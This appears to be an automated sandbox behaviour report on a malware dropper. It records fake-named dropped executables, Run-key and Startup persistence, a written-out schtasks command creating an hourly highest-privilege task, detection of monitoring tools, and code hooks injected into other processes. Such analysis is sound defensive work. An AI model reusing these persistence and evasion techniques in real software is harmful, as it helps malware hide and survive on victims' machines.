Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HBU3P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	File created: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	File created: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	File created: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Window searched: window name: RegmonClass

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Creates or modifies windows services

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5

Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2C50005 value: E9 2B BA 27 74	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 76ECBA30 value: E9 DA 45 D8 8B	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2C60008 value: E9 8B 8E 2B 74	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 76F18E90 value: E9 80 71 D4 8B	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2C80005 value: E9 8B 4D F7 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 75BF4D90 value: E9 7A B2 08 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2C90005 value: E9 EB EB F7 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 75C0EBF0 value: E9 1A 14 08 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2CA0005 value: E9 8B 8A 33 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 74FD8A90 value: E9 7A 75 CC 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2CB0005 value: E9 2B 02 35 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 75000230 value: E9 DA FD CA 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 1170005 value: E9 2B BA D5 75
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 76ECBA30 value: E9 DA 45 2A 8A
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 11D0008 value: E9 8B 8E D4 75
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 76F18E90 value: E9 80 71 2B 8A
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 11F0005 value: E9 8B 4D A0 74
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 75BF4D90 value: E9 7A B2 5F 8B
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 1200005 value: E9 EB EB A0 74
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 75C0EBF0 value: E9 1A 14 5F 8B
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 1210005 value: E9 8B 8A DC 73
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 74FD8A90 value: E9 7A 75 23 8C
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 2D90005 value: E9 2B 02 27 72
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 75000230 value: E9 DA FD D8 8D
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Memory written: PID: 7792 base: 1990005 value: E9 8B 2F 57 75
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Memory written: PID: 7792 base: 76F02F90 value: E9 7A D0 A8 8A
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Memory written: PID: 7808 base: 7FFE22370008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Memory written: PID: 7808 base: 7FFE2220D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 12E0005 value: E9 2B BA BE 75
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 76ECBA30 value: E9 DA 45 41 8A
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 12F0008 value: E9 8B 8E C2 75
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 76F18E90 value: E9 80 71 3D 8A
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 1310005 value: E9 8B 4D 8E 74
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 75BF4D90 value: E9 7A B2 71 8B
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 1320005 value: E9 EB EB 8E 74
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 75C0EBF0 value: E9 1A 14 71 8B
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 1330005 value: E9 8B 8A CA 73
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 74FD8A90 value: E9 7A 75 35 8C
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 1450005 value: E9 2B 02 BB 73
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 75000230 value: E9 DA FD 44 8C

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

7_2_00481A30

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
